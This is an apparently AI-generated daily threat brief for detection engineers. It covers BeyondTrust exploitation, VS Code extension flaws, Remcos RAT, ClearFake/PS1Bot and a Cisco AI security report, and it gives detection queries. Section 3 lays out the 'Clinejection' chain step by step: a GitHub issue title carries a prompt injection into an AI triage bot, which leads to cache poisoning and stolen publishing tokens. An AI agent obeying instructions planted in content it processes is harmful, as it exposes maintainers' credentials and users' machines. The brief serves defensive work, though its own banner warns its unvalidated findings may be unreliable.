Cyber Threat Brief — February 20, 2026
⚠️ This report is AI-generated. Always validate findings.
Cyber Threat Brief — February 20, 2026
A daily intelligence digest for detection engineers and threat hunters.
1. BeyondTrust CVE-2026-1731 — VShell & SparkRAT Post-Exploitation (UPDATE)
What’s New
Unit 42 published detailed post-exploitation TTPs from ongoing BeyondTrust Remote Support exploitation, including deployment of VShell and SparkRAT backdoors, sophisticated web shells, and DNS tunneling for C2 evasion.
See Feb 13 brief for initial vulnerability analysis.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2026-1731 |
| CVSS | 9.9 |
| Affected | BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) |
| Exposed Instances | 10,600+ (Cortex Xpanse) |
| Targeted Sectors | Financial services, Legal, High-tech, Higher Ed, Healthcare |
| Targeted Regions | US, France, Germany, Australia, Canada |
New Post-Exploitation Activity:
- Administrative Takeover: Custom Python script backs up admin password hash, injects new hash for 60-second access window, self-destructs
- Web Shells: Password-protected PHP web shells including
aws.phpwith China Chopper/AntSword-style delimiters - Config STOMPing: Bash dropper modifies Apache config in memory while keeping disk config clean
- Backdoors: VShell (fileless Linux backdoor), SparkRAT (cross-platform Go RAT)
- C2 Evasion: DNS tunneling via OAST techniques to oastify[.]com domains
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 - Exploit Public-Facing App | WebSocket to thin-scc-wrapper with crafted remoteVersion |
| Execution | T1059.006 - Python | Admin takeover script with sqlite3, check_auth binary |
| Persistence | T1505.003 - Web Shell | PHP backdoors (aws.php, file_save.php) with eval() |
| Defense Evasion | T1070.004 - File Deletion | Script self-destructs, config STOMPing hides Apache changes |
| Defense Evasion | T1572 - Protocol Tunneling | DNS tunneling to OAST domains for C2/exfil |
| C2 | T1071.004 - DNS | Hostname encoded in subdomain for covert comms |
| Exfiltration | T1041 - Exfil Over C2 | PostgreSQL dumps, config files compressed and transmitted |
Detection Opportunities
# Web shell detection - PHP eval with POST parameter
process_name="php*" AND command_line="*eval*" AND http_method="POST"
# DNS tunneling via nslookup (hostname hex-encoded in subdomain)
process_name="nslookup" AND dns_query_name MATCHES "[a-f0-9]{10,}\\..*\\.oastify\\.com"
# PowerShell DNS exfil with BitConverter encoding
process_name="powershell*" AND command_line="*BitConverter*" AND command_line="*nslookup*"
# SparkRAT user-agent detection
http_user_agent="SPARK-COMMIT"
# VShell file pattern detection (unusually long filenames)
file_name_length > 100 AND file_path="/tmp/*"Log Sources
- Web server access logs (Apache, IIS)
- DNS query logs (passive DNS, Zeek)
- Sysmon Event ID 1 (Process Creation), 22 (DNS Query)
- Network proxy logs with user-agent tracking
- EDR telemetry for fileless execution
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ SparkRAT UA, VShell filename patterns |
| Splunk ESCU | ❌ Gap — No specific BeyondTrust exploitation detection |
| Elastic | ❌ Gap — No VShell/SparkRAT rules |
Recommendation: Build detections for PHP web shells using eval() with specific POST parameter patterns. Add DNS tunneling detection for OAST domains.
Sources
- Unit 42: VShell and SparkRAT in BeyondTrust Exploitation — Published Feb 19, 2026
2. VS Code Extension Vulnerabilities — 128M+ Downloads Affected
What’s New
Four critical to high-severity vulnerabilities in popular VS Code extensions enable remote code execution and file exfiltration. Maintainers unresponsive to responsible disclosure since July 2025.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2025-65717, CVE-2025-65716, CVE-2025-65715 |
| CVSS | 9.1 (Critical), 8.8 (High), 7.8 (High) |
| Affected Extensions | Live Server (72M), Markdown Preview Enhanced (8.5M), Code Runner (37M), Microsoft Live Preview (11M) |
| Total Downloads | 128+ million |
| Patch Status | Unpatched (except MS Live Preview silently fixed in v0.4.16) |
Vulnerability Details:
- CVE-2025-65717 (Critical 9.1): Live Server allows remote file exfiltration via malicious link while server is running
- CVE-2025-65716 (High 8.8): Markdown Preview Enhanced executes arbitrary JavaScript in HTML tags, enables network scanning
- CVE-2025-65715 (High 7.8): Code Runner allows RCE through malicious settings.json modification
- MS Live Preview: localhost requests can enumerate and exfiltrate files when extension is active
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1566.002 - Spearphishing Link | Malicious link sent while dev has Live Server running |
| Execution | T1204.002 - Malicious File | Crafted Markdown file with embedded JS |
| Collection | T1005 - Data from Local System | File enumeration via localhost requests |
| Exfiltration | T1567 - Exfil Over Web Service | Data sent to attacker-controlled server |
Detection Opportunities
# Detect localhost connections to unexpected ports (Live Server default 5500)
network_direction="outbound" AND dest_ip="127.0.0.1" AND dest_port IN (5500, 5501, 3000)
# Detect VS Code extensions making external connections
process_parent_name="Code.exe" AND network_direction="outbound" AND dest_ip NOT IN (internal_ranges)
# Code Runner suspicious execution
process_name="node.exe" AND process_parent_name="Code.exe" AND command_line="*-e*"
# Markdown file with embedded script tags
file_extension=".md" AND file_content MATCHES "<script.*>.*</script>"Log Sources
- EDR telemetry (process trees, network connections)
- Web proxy logs
- VS Code extension logs
- Network flow data
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No VS Code extension-specific rules |
| Splunk ESCU | ❌ Gap — No IDE supply chain detections |
| Elastic | ❌ Gap — Limited developer tool coverage |
Recommendation: Until patches are available, disable Live Server extension when not actively using it. Avoid opening untrusted Markdown files.
Sources
- Infosecurity Magazine: Flaws in Popular IDE Extensions — Published Feb 19, 2026
- OX Security Research — Published Feb 17, 2026
3. Cline Supply Chain Attack — AI Triage Bot Weaponized
What’s New
An attacker exploited prompt injection in Cline’s AI issue triage bot to steal npm credentials and publish a malicious package version, installing OpenClaw on developer machines for 8 hours. The attack chain (dubbed “Clinejection”) demonstrates AI agents as the new CI/CD attack surface.
Technical Details
| Field | Value |
|---|---|
| Affected | Cline CLI v2.3.0 (npm) |
| Users Impacted | Developers who updated during 8-hour window |
| Payload | Global OpenClaw installation via postinstall script |
| Attack Vector | GitHub issue title → prompt injection → cache poisoning → credential theft |
| Disclosure | Feb 9, 2026 (Adnan Khan) |
| Exploitation | Feb 17, 2026 |
Attack Chain:
- Attacker creates GitHub issue with crafted title containing prompt injection
- AI triage bot (claude-code-action) processes malicious title
- Bot runs
npm installfrom attacker-controlled commit via dangling commit technique - Malicious preinstall script deploys Cacheract for Actions cache poisoning
- Cache poisoning targets nightly release workflow
- Attacker exfiltrates VSCE_PAT, OVSX_PAT, NPM_RELEASE_TOKEN
- Malicious [email protected] published to npm
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1195.002 - Supply Chain Compromise | Malicious npm package pushed |
| Execution | T1059.001 - PowerShell | postinstall script installs OpenClaw |
| Persistence | T1546 - Event Triggered Execution | npm lifecycle scripts |
| Defense Evasion | T1574.001 - Hijack Execution Flow | GitHub Actions cache poisoning |
| Credential Access | T1552.001 - Credentials in Files | Exfiltration of npm tokens, VS Code PATs |
Detection Opportunities
# Detect unexpected global npm installs
process_name="npm" AND command_line="*install*-g*openclaw*"
# GitHub Actions cache anomalies (Cacheract signature)
github_actions_step="actions/checkout" AND step_output="" AND exit_code != 0
# npm postinstall script execution
process_parent_name="npm*" AND script_name="postinstall"
# Suspicious AI agent process spawning shell commands
process_grandparent_name MATCHES "(claude|anthropic|ai-bot)" AND process_name IN ("bash", "sh", "cmd.exe")Log Sources
- npm audit logs
- GitHub Actions workflow logs
- CI/CD pipeline telemetry
- Package manager install logs
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No AI agent exploitation rules |
| Splunk ESCU | ❌ Gap — Limited CI/CD supply chain coverage |
| Elastic | ❌ Gap — No prompt injection detection |
Recommendation: If you installed [email protected] via npm, uninstall it and OpenClaw immediately. Rotate any credentials accessible from affected machines.
Sources
- Snyk: How “Clinejection” Turned an AI Bot into a Supply Chain Attack — Published Feb 19, 2026
- GitHub Advisory GHSA-9ppg-jx86-fqw7 — Published Feb 17, 2026
4. Remcos RAT — Real-Time Surveillance Capabilities Added
What’s New
New Remcos RAT variant adds real-time webcam streaming and live keylogging, shifting from local data storage to direct C2 transmission for reduced forensic footprint.
Technical Details
| Field | Value |
|---|---|
| Malware Family | Remcos RAT |
| Variant | New (Feb 2026) |
| Target OS | Windows |
| C2 Protocol | Encrypted HTTP/TCP |
| Mutex | Rmc-GSEGIF |
New Capabilities:
- Live webcam streaming via downloaded DLL module (not embedded)
- Online keylogging with real-time C2 transmission
- Encrypted C2 config decrypted only in memory
- Dynamic API resolution to evade static analysis
- Cleanup routines removing logs, browser data, registry persistence
- VBS script self-deletion mechanism
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Execution | T1059.005 - Visual Basic | Temp VBS scripts for self-deletion |
| Persistence | T1547.001 - Registry Run Keys | Modified registry entries |
| Defense Evasion | T1027 - Obfuscated Files | Encrypted C2 config, dynamic API loading |
| Collection | T1056.001 - Keylogging | Real-time keystroke capture |
| Collection | T1125 - Video Capture | Live webcam streaming via DLL module |
| C2 | T1573.001 - Encrypted Channel | Encrypted HTTP/TCP communications |
| Exfiltration | T1041 - Exfil Over C2 | Real-time data transmission |
Detection Opportunities
# Remcos mutex detection
create_mutex_name="Rmc-GSEGIF"
# Webcam DLL module loading at runtime
process_name="*" AND loaded_dll MATCHES ".*cam.*\.dll" AND dll_load_type="dynamic"
# VBS self-deletion script in TEMP
file_path="%TEMP%\\*.vbs" AND file_content MATCHES "(WScript\.Shell|DeleteFile)"
# PowerShell Windows Defender exclusion (common Remcos technique)
process_name="powershell*" AND command_line="*Add-MpPreference*" AND command_line="*ExclusionPath*"
# Suspicious outbound connections from process with webcam access
process_has_camera_access=true AND network_direction="outbound" AND dest_port NOT IN (443, 80)Log Sources
- Sysmon Event ID 1, 7 (Process/DLL), 3 (Network)
- Windows Defender logs
- EDR telemetry with API monitoring
- USB/Camera access logs
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No Remcos-specific rules |
| Splunk ESCU | ✅ Defender exclusion detection, suspicious DNS queries |
| Elastic | ⚠️ Partial — Generic RAT behaviors |
Recommendation: Monitor for processes dynamically loading webcam-related DLLs and making encrypted outbound connections.
Sources
- Infosecurity Magazine: Remcos RAT Expands Real-Time Surveillance — Published Feb 19, 2026
- Point Wild / Lat61 Threat Intelligence Research
5. ClearFake & PS1Bot — Red Canary Intelligence Insights
What’s New
Red Canary’s February 2026 Intelligence Insights highlights ClearFake (fake CAPTCHA paste-and-run) and PS1Bot (modular PowerShell stealer) as top threats, with new detection opportunities.
Technical Details
| Field | Value |
|---|---|
| Threats | ClearFake, PS1Bot, ScreenConnect (malicious use), NetSupport Manager |
| Distribution | Compromised WordPress sites, SEO poisoning, malvertising |
| Payloads | Amadey, ArechClientC2, LummaC2, Rhadamanthys |
ClearFake Evolution:
- Now using fake CAPTCHA paste-and-run lures
- Recent execution via SyncAppvPublishingServer.vbs (LOLBIN)
- PowerShell with invoke-restmethod to attacker IPs
PS1Bot Modules:
- Keylogger
- Screen capture
- Info stealer (passwords, crypto seeds, MFA app data)
- Delivered via SEO poisoning (ZIP files with malicious JS)
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1189 - Drive-by Compromise | Compromised WordPress sites |
| Execution | T1204.004 - User Execution: Copy Paste | Fake CAPTCHA paste-and-run |
| Execution | T1059.001 - PowerShell | irm/iex to remote IP |
| Defense Evasion | T1218.011 - Signed Script Proxy | SyncAppvPublishingServer.vbs abuse |
| Collection | T1056.001 - Keylogging | PS1Bot keylogger module |
| Credential Access | T1555 - Credentials from Password Stores | Browser credential theft |
Detection Opportunities
# ClearFake PowerShell download (Red Canary detection)
process_name="powershell"
AND deobfuscated_command MATCHES "(irm|invoke-restmethod)"
AND deobfuscated_command MATCHES "(iex|invoke-expression)"
AND deobfuscated_command MATCHES "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
# SyncAppvPublishingServer.vbs abuse
process_name="wscript.exe"
AND command_line="*SyncAppvPublishingServer.vbs*"
AND command_line MATCHES "(cdn\.jsdelivr|gal i\*x)"
# PS1Bot initial execution (wscript running JS from ZIP)
process_name="wscript.exe"
AND command_line="*FULL DOCUMENT.js*"
# PS1Bot random ProgramData directory
file_path MATCHES "C:\\ProgramData\\[a-zA-Z]{2,8}\\.*\.ps1"Log Sources
- Sysmon Event ID 1 (Process Creation)
- PowerShell ScriptBlock logging (Event ID 4104)
- DNS query logs
- Web proxy logs
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ⚠️ Partial — Generic PowerShell download rules |
| Splunk ESCU | ✅ PowerShell suspicious commands |
| Elastic | ⚠️ Partial — LOLBIN abuse detection |
Sources
- Red Canary: Intelligence Insights February 2026 — Published Feb 19, 2026
6. Cisco State of AI Security 2026 — MCP Agent Risks
What’s New
Cisco released the State of AI Security 2026 report highlighting Model Context Protocol (MCP) agentic AI as a growing risk surface, with open-source scanners for MCP, A2A, and agentic skill files released.
Key Findings
- 83% of organizations planned to deploy agentic AI, but only 29% felt security-ready
- MCP agents can be weaponized by adversaries for automated attack campaigns
- AI supply chain (datasets, models, tools) increasingly fragile
- Open-weight models remain susceptible to jailbreaks and prompt injection
Detection Relevance
Organizations deploying AI agents should:
- Monitor for suspicious MCP server connections
- Audit AI agent skill/tool permissions
- Implement prompt injection detection at ingestion points
- Log all AI agent tool invocations
Sources
- Cisco: State of AI Security 2026 — Published Feb 19, 2026
Priority Actions
- BeyondTrust: Hunt for PHP web shells with eval() patterns, DNS tunneling to OAST domains, SparkRAT user-agent strings
- VS Code Extensions: Disable Live Server when not in use; audit extension network connections
- CI/CD Security: Review AI agent permissions in GitHub Actions; implement cache isolation
- Remcos: Alert on dynamic webcam DLL loading + encrypted outbound connections
- ClearFake/PS1Bot: Detect PowerShell irm/iex to raw IP addresses; monitor for SyncAppvPublishingServer.vbs abuse
Generated: February 20, 2026 05:00 PST